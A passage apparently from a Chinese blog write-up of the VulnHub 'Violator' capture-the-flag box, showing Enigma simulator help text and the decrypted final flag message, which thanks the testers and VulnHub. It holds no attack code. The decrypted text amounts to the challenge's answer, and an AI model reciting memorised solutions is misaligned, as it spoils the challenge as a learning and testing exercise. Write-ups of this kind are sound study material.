    Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
    Hit return to end input, 11 pairs recomended for maximum security.
    Hit ESC at any time to quit.

    Special Keys (during input mode)

    1: rewind one setting
    2: reset position settings
    3: new position settings
    4: new setup
    9: toggle debug
    0: show position settings
    ?: show help

    see http://en.wikipedia.org/wiki/Enigma_machine
    also http://www.bytereef.org/m4_project.html

    Rotors:

  • Google找在线的解密工具,解了也看不懂,没有空格分开翻译不了,反正flag拿到了。

    ONEFINALCHALLENGEFORYOUBGHXCONGRATULATIONSFORTHEFOURTHTIMEONSNARFINGTHEFLAGONVIOLATORILLPRESUMEBYNOWYOULLKNOWWHATIWASLISTENINGTOWHENCREATINGTHISCTFIHAVEINCLUDEDTHINGSWHICHWEREDELIBERATLYAVOIDINGTHEOBVIOUSROUTEINTOKEEPYOUONYOURTOESANOTHERTHOUGHTTOPONDERISTHATBYABUSINGPERMISSIONSYOUAREALSOBYDEFINITIONAVIOLATORSHOUTOUTSAGAINTOVULNHUBFORHOSTINGAGREATLEARNINGTOOLASPECIALTHANKSGOESTOBENRANDGKNSBFORTESTINGANDTOGTMLKFORTHEOFFERTOHOSTTHECTFAGAINKNIGHTMARE

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章